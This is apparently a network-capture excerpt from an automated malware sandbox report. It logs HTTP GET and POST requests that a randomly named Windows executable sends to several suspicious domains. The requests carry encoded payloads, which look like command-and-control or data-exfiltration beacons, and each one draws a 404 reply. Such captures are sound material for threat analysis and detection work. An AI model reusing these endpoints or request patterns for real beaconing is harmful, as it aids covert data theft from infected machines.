                                                                                  Feb 18, 2025 08:09:10.958609104 CET1236INData Raw: 63 a1 05 6b a4 9b 2f 50 4b 35 d9 c9 d9 59 ce 67 1d c7 6e 50 94 5e 78 2b 35 ed 85 c6 ca ce 82 e1 a4 aa a5 2a 18 43 12 89 94 80 4c 58 93 89 69 a5 ba 32 d8 a6 66 b7 eb ed ee d8 24 66 17 09 c9 90 31 c4 72 59 6f 50 4b 3d 22 34 2c a8 86 b1 d9 2c 6a 8f
                                                                                  Data Ascii: ck/PK5YgnP^x+5*CLXi2f$f1rYoPK="4,,j]f_"f)%5q\BKu(8@fi 1[5XmVt0xXjhJ `~0.fuSC6nO3fyy6[;w6vUzMdg
                                                                                  Feb 18, 2025 08:09:10.958620071 CET956INData Raw: a2 35 6f 3a 36 3b 37 a5 ad 64 ac 52 de 75 c3 c2 32 92 9d 24 2b 86 28 7a 7e 31 56 b1 2a 19 46 11 ef 7c 6e 97 5a 7a a7 c4 84 38 b0 b3 5d 0b 80 b8 61 f6 87 08 19 3a 97 75 e4 8c d8 f5 13 db 38 21 3e c2 f7 01 89 c4 fa 64 75 04 91 79 f9 2f 53 98 59 36
                                                                                  Data Ascii: 5o:6;7dRu2$+(z~1V*F|nZz8]a:u8!>duy/SY6%,gtOn ;|_th,-yx4G|p!1Hzyf74J;F<wkG2kL/Km?}P}S+Jpe=uq@jjKh


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.649993104.21.16.1803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:09:12.936505079 CET568OUTGET /k566/?WHYh=mJr4VrfpGDBp&cf2hYv=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MwTnQBeuAzsSoj839zvz1sEY8eOyaRRELHSv6n+5nuEPWCNCpw= HTTP/1.1
                                                                                  Host: www.tumbetgirislinki.fit
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Feb 18, 2025 08:09:13.667821884 CET885INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 18 Feb 2025 07:09:13 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Accept-Ranges: bytes
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ny3aTbonpW6CIcNYggui1qW4LOZssbRNRRvaUJuMcRUXUeRuBkPG7cvktG9wILYGMjD7P0Dh9Qp8ZDBrCFOWoorRxAAXxzqPq%2F22jTQr2oeJvSnMS7MTkLcnk59hDe%2B%2FDDonKyU5em3D6PY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 913c30be6a504405-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2339&min_rtt=2339&rtt_var=1169&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=568&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Feb 18, 2025 08:09:13.668132067 CET1236INData Raw: 32 61 36 62 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e
                                                                                  Data Ascii: 2a6b<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv=
                                                                                  Feb 18, 2025 08:09:13.668144941 CET1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0;
                                                                                  Feb 18, 2025 08:09:13.668155909 CET1236INData Raw: 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: rver address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { bo
                                                                                  Feb 18, 2025 08:09:13.668165922 CET1236INData Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20
                                                                                  Data Ascii: dress { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
                                                                                  Feb 18, 2025 08:09:13.668178082 CET1236INData Raw: 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58
                                                                                  Data Ascii: ZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0
                                                                                  Feb 18, 2025 08:09:13.668188095 CET1120INData Raw: 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49
                                                                                  Data Ascii: sbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006Lb
                                                                                  Feb 18, 2025 08:09:13.668200016 CET1236INData Raw: 59 55 49 6e 6a 70 6b 52 63 65 63 57 66 6b 45 6d 64 43 41 65 68 67 75 65 75 54 6d 4e 74 2b 73 68 6b 52 65 4b 64 33 76 36 37 6e 50 39 63 4e 44 4a 48 76 6f 44 2b 2b 78 64 76 70 6f 76 58 4b 43 70 35 53 66 6f 47 78 48 73 6a 30 79 46 2b 49 77 48 55 75
                                                                                  Data Ascii: YUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z
                                                                                  Feb 18, 2025 08:09:13.668210983 CET1236INData Raw: 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f
                                                                                  Data Ascii: class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this error screen to www.tumbetgirislinki.fit's <a href="/cdn-cgi/l/email-protection#a7cec9c1c8e7c3c3c6d0d
                                                                                  Feb 18, 2025 08:09:13.668456078 CET1100INData Raw: 69 6d 61 67 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 68 65 61 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: image" /> <div class="info-heading"> www.tumbetgirislinki.fit/k566/?WHYh=mJr4VrfpGDBp&amp;cf2hYv=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+M


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.649994104.21.112.1803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:09:18.733664989 CET825OUTPOST /jgkl/ HTTP/1.1
                                                                                  Host: www.lucynoel6465.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.lucynoel6465.shop
                                                                                  Referer: http://www.lucynoel6465.shop/jgkl/
                                                                                  Content-Length: 211
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Data Raw: 63 66 32 68 59 76 3d 73 4b 57 38 48 30 49 4b 4a 78 43 37 54 62 44 6b 34 63 5a 64 43 55 69 7a 55 39 51 63 4a 47 79 36 2f 56 58 62 30 77 49 6a 33 42 4d 53 67 32 6f 4f 4d 36 31 61 55 7a 4f 65 6e 5a 78 37 54 34 71 61 5a 47 41 37 61 5a 37 7a 6c 71 4e 48 63 66 54 73 67 55 70 38 5a 63 39 46 6e 78 37 37 4d 48 32 6a 68 69 38 58 72 56 5a 42 37 44 4e 52 4d 2b 42 65 34 75 50 62 55 47 6f 77 37 51 4b 74 2b 73 6d 32 36 69 61 55 45 71 42 32 54 69 51 34 4a 4e 48 59 43 6f 52 68 31 51 30 39 30 32 61 79 65 68 63 42 71 7a 6f 59 75 42 51 76 52 58 51 6e 6e 75 6a 75 70 71 74 4a 54 61 48 36 46 2b 4d 75 6d 31 6f 37 53 45 78 59 6e 4a 71 63 45 48 2b 4c
                                                                                  Data Ascii: cf2hYv=sKW8H0IKJxC7TbDk4cZdCUizU9QcJGy6/VXb0wIj3BMSg2oOM61aUzOenZx7T4qaZGA7aZ7zlqNHcfTsgUp8Zc9Fnx77MH2jhi8XrVZB7DNRM+Be4uPbUGow7QKt+sm26iaUEqB2TiQ4JNHYCoRh1Q0902ayehcBqzoYuBQvRXQnnujupqtJTaH6F+Mum1o7SExYnJqcEH+L
                                                                                  Feb 18, 2025 08:09:19.478905916 CET925INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 18 Feb 2025 07:09:19 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yGzNhkzZUfvqFfNvqT043G0Vut8XrzuVSoVRSJycGqXaJgx7w2ohBkW1KqqC9o1Q5ARwSkDXg6tpXDEMed9thyI%2FZMcdo6kzcYLD9HHp8gqBOpOuBqsymX%2B8ZERJGTuYVeMuucwqss0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 913c30e2aa234321-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1587&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=825&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.649995104.21.112.1803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:09:21.479305029 CET849OUTPOST /jgkl/ HTTP/1.1
                                                                                  Host: www.lucynoel6465.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.lucynoel6465.shop
                                                                                  Referer: http://www.lucynoel6465.shop/jgkl/
                                                                                  Content-Length: 235
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Data Raw: 63 66 32 68 59 76 3d 73 4b 57 38 48 30 49 4b 4a 78 43 37 53 37 7a 6b 36 37 46 64 4b 55 69 79 62 64 51 63 48 57 7a 53 2f 56 72 62 30 79 6b 7a 33 7a 34 53 67 53 6b 4f 65 4c 31 61 5a 54 4f 65 73 35 78 30 4f 49 71 72 5a 47 4d 7a 61 59 48 7a 6c 71 4a 48 63 65 44 73 38 7a 64 6a 59 4d 39 39 68 78 37 35 42 6e 32 6a 68 69 38 58 72 56 63 61 37 44 6c 52 4d 50 78 65 70 2f 50 59 63 6d 6f 33 73 67 4b 74 36 73 6d 74 36 69 61 79 45 75 49 54 54 68 34 34 4a 4d 33 59 62 5a 52 69 37 51 30 42 77 32 62 4c 51 7a 56 46 73 46 38 55 74 58 59 39 4a 48 4d 44 69 59 2b 30 31 5a 74 71 42 4b 6e 34 46 38 55 63 6d 56 6f 52 51 45 4a 59 31 65 6d 37 4c 7a 62 6f 66 78 38 47 54 7a 74 71 42 34 67 79 4a 45 33 39 7a 43 78 53 2b 77 3d 3d
                                                                                  Data Ascii: cf2hYv=sKW8H0IKJxC7S7zk67FdKUiybdQcHWzS/Vrb0ykz3z4SgSkOeL1aZTOes5x0OIqrZGMzaYHzlqJHceDs8zdjYM99hx75Bn2jhi8XrVca7DlRMPxep/PYcmo3sgKt6smt6iayEuITTh44JM3YbZRi7Q0Bw2bLQzVFsF8UtXY9JHMDiY+01ZtqBKn4F8UcmVoRQEJY1em7Lzbofx8GTztqB4gyJE39zCxS+w==
                                                                                  Feb 18, 2025 08:09:22.016393900 CET923INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 18 Feb 2025 07:09:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HslCj8qyHvn3hSjXL6iLukQlaoNWdRcXt6taex1wfriiSD1pSRTMsc1vRLTOyhAd7SsPTTrGCssE4YZKkOsHG5oWNn5hDs8uxD40Ui9kO3NUvvR6Bh2z4wpJpH%2FqEgrko4ZUyxPb3hY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 913c30f2bc0e1a17-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1886&min_rtt=1886&rtt_var=943&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=849&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.649996104.21.112.1803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:09:24.072627068 CET1862OUTPOST /jgkl/ HTTP/1.1
                                                                                  Host: www.lucynoel6465.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.lucynoel6465.shop
                                                                                  Referer: http://www.lucynoel6465.shop/jgkl/
                                                                                  Content-Length: 1247
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Data Raw: 63 66 32 68 59 76 3d 73 4b 57 38 48 30 49 4b 4a 78 43 37 53 37 7a 6b 36 37 46 64 4b 55 69 79 62 64 51 63 48 57 7a 53 2f 56 72 62 30 79 6b 7a 33 7a 67 53 67 48 34 4f 50 59 64 61 59 54 4f 65 77 4a 77 54 4f 49 71 4d 5a 47 55 4e 61 59 4b 45 6c 6f 42 48 4f 73 62 73 77 58 42 6a 53 4d 39 39 6a 78 37 34 4d 48 32 32 68 6a 4e 65 72 55 73 61 37 44 6c 52 4d 4d 70 65 35 65 50 59 65 6d 6f 77 37 51 4b 35 2b 73 6e 43 36 6d 2b 4d 45 75 45 70 54 51 59 34 4a 73 6e 59 5a 4c 35 69 7a 51 30 48 31 32 62 36 51 7a 4a 4b 73 42 64 76 74 58 45 58 4a 47 30 44 67 39 54 34 6d 64 39 62 54 36 72 59 63 4d 67 42 6d 31 39 75 51 56 68 67 32 65 61 4b 4b 77 6a 66 47 55 59 44 52 67 59 63 44 4a 5a 61 4b 45 6a 6a 36 57 63 46 2b 69 79 30 59 73 39 56 58 56 32 42 48 69 37 4c 39 63 52 4c 44 5a 64 35 50 6e 53 73 6d 30 32 7a 69 37 34 68 2f 58 6f 2f 4c 58 65 52 53 42 4e 58 36 4a 58 44 75 63 4f 4b 30 75 4b 58 6c 4a 37 6e 2f 64 67 38 66 47 53 31 38 66 66 78 2b 62 59 38 7a 65 62 35 59 43 6d 38 4c 50 39 46 6c 38 58 78 6a 71 33 53 75 48 69 51 6d 49 78 [TRUNCATED]
                                                                                  Data Ascii: cf2hYv=sKW8H0IKJxC7S7zk67FdKUiybdQcHWzS/Vrb0ykz3zgSgH4OPYdaYTOewJwTOIqMZGUNaYKEloBHOsbswXBjSM99jx74MH22hjNerUsa7DlRMMpe5ePYemow7QK5+snC6m+MEuEpTQY4JsnYZL5izQ0H12b6QzJKsBdvtXEXJG0Dg9T4md9bT6rYcMgBm19uQVhg2eaKKwjfGUYDRgYcDJZaKEjj6WcF+iy0Ys9VXV2BHi7L9cRLDZd5PnSsm02zi74h/Xo/LXeRSBNX6JXDucOK0uKXlJ7n/dg8fGS18ffx+bY8zeb5YCm8LP9Fl8Xxjq3SuHiQmIxMBP7FdwSGOuDr0gcd5IJj/pMkY0g86qs3KS7vKQgVHTtf9N30Jd7nqz80EiN05w1udds3gIKBrsW6dWXMCY3UpU1kmoPUkMWL+uYQ6aS54eQIIi7V07V2yLCLzoEhj1gv86LtjykuCxfb201Yvzie/NRDr9dZP385FqU+t4zs8ioMhnfIlOEL0DHE8rtf8XrSIVmA26BQMmvLacowi53GmKx655/rUmPlfhZefdGWlJu5LkyqhdA5Ud1ogvs+MzGpuZWw3v0Upq7NU+zwHDfpSHmar5j5O/ymt+5SNKLQM4qFeeOVTYui3vQ5dF6OJ243tNjfDvmWD/3spvFaHY8zgxYmevdgvK/Da7IMslilxm2AYF0JK9gyzgylxF9ldZ0sM7NNNREPcpgRNMALNWMrSO62hrP8QXJTL0iXhiYZwe34hVy1GPoWKkKScl3KWyKH1gjcnbfV7XI4YKRDK29fjFv1TFzRqXpKASa1zMIMJfJzO42tlKndkA/qk+0R6WZRTa4EbLJdxAuNrxfhyU/k2o9yvqaVEseRfDMnO4tVXW3Bc289hYQPG1uoo+CPbUU1EjbSyyqE6SyfedX/nEIPAdFAMnctlfwSVL3qj1Aw/vvLrammZqH7OSQn4xahIzQ/fTj2FoXN7WUHUPEQtx1rcJx0PAASuzGTG [TRUNCATED]
                                                                                  Feb 18, 2025 08:09:24.762393951 CET927INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 18 Feb 2025 07:09:24 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fSaeqNG%2FzmiYXqInkSioUHvH%2BkdZBBqXxiz5QTJDgKkBFLt0aI5qOwOxI0VfKxHtPVmbe5KKix679yR09bGIUQaYnNO23IqLXzoFRua8seSt1V0UnRcVv6uEpzXWYC2NXXy8wxLTeik%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 913c3103bc428c8f-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2007&rtt_var=1003&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1862&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.649997104.21.112.1803840C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Feb 18, 2025 08:09:26.610836983 CET565OUTGET /jgkl/?cf2hYv=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+lylzXZBDngtVYDkWplwhs1JNVM9/WuG0QosQeZid/o9jeqLeg=&WHYh=mJr4VrfpGDBp HTTP/1.1
                                                                                  Host: www.lucynoel6465.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.5
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
                                                                                  Feb 18, 2025 08:09:27.322196007 CET946INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 18 Feb 2025 07:09:27 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AwtyrTi%2FDXDnBe%2FfbwPUn7PmPhT8b0%2FYF77Qi8i1Da4UQ%2BhFVweyVC5m5R3uh2z1gLThZMbHpdku9UgxbP92kyjdImnxxB1hhL4ka%2BybmfGjFPSiDh2PhdzXaHA%2FzEzD0gw2g1StZM8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 913c3113de697289-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1901&rtt_var=950&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=565&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
